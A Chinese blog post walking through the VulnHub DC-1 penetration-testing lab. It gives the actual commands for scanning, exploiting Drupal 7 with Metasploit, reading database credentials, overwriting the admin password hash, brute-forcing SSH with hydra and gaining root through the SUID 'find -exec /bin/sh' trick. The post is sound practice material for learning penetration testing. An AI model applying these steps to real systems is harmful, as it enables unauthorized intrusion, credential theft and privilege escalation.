首页 > 其他分享 >VulnHub_DC-1渗透流程

VulnHub_DC-1渗透流程

时间:2023-05-29 18:22:51浏览次数:38  
标签:etc 渗透 DC 192.168 密码 flag4 VulnHub 权限 root

DC-1

DC-1 是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。

它旨在为初学者提供挑战,但它的难易程度取决于您的技能和知识,以及您的学习能力。

要成功完成此挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。

获得 root 的方法有多种,我提供了一些flag,其中包含为初学者提供的线索。

总共有五个标志,但最终目的是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 用户即可执行此操作,但是,您将需要 root 用户权限。

根据您的技能水平,您可以跳过查找这些标志中的大部分并直接获取 root 权限。

初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该足以获得完成这一挑战所需的信息。

信息收集

nmap 192.168.157.0/24	//扫描网段
nmap -sV 192.168.157.142	//扫描版本详情

Drupal 7.x漏洞拿flag1

开放了80端口,那先访问网站

检测到是由使用PHP语言编写的开源内容管理系统Drupal搭建的,并且由Wappalyzer得知版本为7.X,所以直接使用searchsploit命令在漏洞库中搜索此版本是否有漏洞可以利用

searchsploit Drupal 7.X

有一个PHP远程代码执行的漏洞,直接用msf打

msfconsole
search Drupal 7.X
use 0
show options	//查看参数设置
set RHOSTS 192.168.157.142
run

shell
#由于得到的不是一个完整的shell环境,所以我们所以pyhton中的pty模块反弹一个完整的shell环境
python -c 'import pty;pty.spawn("/bin/bash")'

得到flag1.txt

搜寻配置文件拿flag2

根据flag1的提示,去看CMS的config配置文件,Drupal7的配置文件为 sites/default/settings.php

cat sites/default/settings.php

得到flag2以及数据库信息

flag2提示爆破和目录扫描并不是唯一获得后台的方法(并且你需要访问权限),下面这些认证信息你如何使用)

修改密码进网站拿flag3

连接数据库

mysql -udbuser -pR0ck3t 

show databases;
use drupaldb;
show tables;
select * from users;

查看数据表 (这里的test是我测试时注册的)

密码是加盐的,一般情况下难以破解,这里选择改密码的方式

首先生成自定密码的加盐哈希值。回到网站的目录下执行php scripts/password-hash.sh 密码命令生成

php scripts/password-hash.sh passwd

重新进入数据库修改密码,确认修改成功

update users set pass="$S$DgOmdbqyyWW6Du5QgThyTT1YoMlC5Pm.piv5Aprc9pejK74CobpC" where name='admin';

admin用户登录成功

在Dashboard得到flag3

查看目录拿flag4

passwdshadow/etc 下的目录

cat /etc/passwd
cat /etc/shadow

/etc/shadow无法查看,权限不够,在etc/passwd下发现目标靶机用户flag4

扩展思考

如何没有查看权限的话应该如何得到flag4

解决方法:

有/bin/bash ,考虑ssh连接

这里用 hydra 爆破flag4用户的密码

hydra -l flag4 -P /usr/share/john/password.lst 192.168.157.142 ssh -vV -f

-l: 登录的用户名,这里是flag4
/usr/share/john/password.lst: 要使用的密码字典文件路径
192.168.157.142: 目标主机IP
ssh: 要破解的服务,这里是ssh服务
-vV: 详细输出,显示详细的连接和破解过程
-f: 当找到可登录的密码后快速结束

提权拿flag5

查看是否具有root权限的命令

find / -perm -4000 2>/dev/null

发现find具有root权限

find -exec /bin/sh \;

提权成功,寻找flag文件

find / -name '*flag*.*' 

得到flag5

简单总结

考察点较全面,思路顺畅,很有趣的一次体验,五个flag很有成就感

标签:etc,渗透,DC,192.168,密码,flag4,VulnHub,权限,root
From: https://www.cnblogs.com/Mar10/p/17441299.html

相关文章

  • Adobe Acrobat DC 2021 中文直装版 win/mac版
    AdobeAcrobatDC2021是一款功能强大的PDF编辑软件。它提供了多种编辑PDF的工具,如创建、编辑、转换和签署PDF文件等。该软件还可以将PDF转换为其他文件格式,如Word、Excel、PowerPoint、图像等。AdobeAcrobatDC2021还支持OCR(光学字符识别)技术,可以将扫描的文档转换......
  • Basic_pentesting_1靶机渗透流程
    Basic_pentesting_1DescriptionThisisasmallboot2rootVMIcreatedformyuniversity’scybersecuritygroup.Itcontainsmultipleremotevulnerabilitiesandmultipleprivilegeescalationvectors.IdidallofmytestingforthisVMonVirtualBox,sot......
  • 渗透测试
    信息收集dnsenum+域名挖掘子域名whois拿注册信息dig+noall+answer-xdnsip亚数信息-SSL/TLS安全评估报告(myssl.com)也可以起到子域名挖掘作用钟馗之眼目录信息收集队友给的php反序列化的基础记录收藏一下反序列化基础知识:魔术方法:<1>.__construct()<2>.__destr......
  • VulnHub-Narak靶机渗透流程
    VulnHub-NarakDescriptionNarakistheHinduequivalentofHell.YouareinthepitwiththeLordofHellhimself.CanyouuseyourhackingskillstogetoutoftheNarak?Burningwallsanddemonsarearoundeverycornerevenyourtrustytoolswillbetra......
  • Vulnhub: AI-WEB-1.0靶机
    kali:192.168.111.111靶机:192.168.111.132信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.132robosts.txt提示两个目录m3diNf0目录下存在info.php漏洞利用se3reTdir777目录下的输入框存在sql注入从phpinfo页面中得知网站根路径利用s......
  • Me-and-My-Girlfriend-1靶机渗透流程
    Me-and-My-Girlfriend-1靶机下载Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,wherethecouplewasoriginallyveryromantic,butsinceAliceworkedataprivatecompany,"CebanCorp",somethinghaschangedfr......
  • Vulnhub靶机DevRandom CTF1.1详细测试过程
    DevRandomCTF:1.1靶机信息名称:DevRandomCTF:1.1地址:https://www.vulnhub.com/entry/devrandom-ctf-11,450/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/DevRandom]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|S......
  • 渗透测试分析 ---- xxe实体注入入门
    因为我对xxe知之甚少,所以使用chatgpt帮忙翻译了一下效果十分优秀,当xml解析器解析了这句话就会取出外部数据 ......
  • [5月摸鱼计划] 浅谈DCDC电压变换(原理、结构、可用)
    DCDC转换器简介在电子产品中,我们常需要不同的直流电压来为电路提供工作,这时我们便会见到LDO和DC/DC的身影,但是严格意义上LDO也是一种DC/DC,在电源芯片选型中,LDO和DC/DC则是两种完全不同的芯片。与线性稳压器LDO相比较,效率高是DC/DC的显著优势,通常效率在70%以上,效率高的可达到95%以上......
  • 《Kali渗透基础》04. 主动信息收集(一)
    目录1:主动信息收集2:发现3:二层发现3.1:arping3.2:nmap3.3:netdiscover3.4:Scapy4:三层发现4.1:ping4.2:Scapy4.3:nmap4.4:fping4.5:hping34.6:traceroute5:四层发现5.1:Scapy5.2:nmap5.3:hping3本文以kali-linux-2022.3-vmware-amd64为例。一些命令与工具只做简单介绍。其使用另见《安全工具......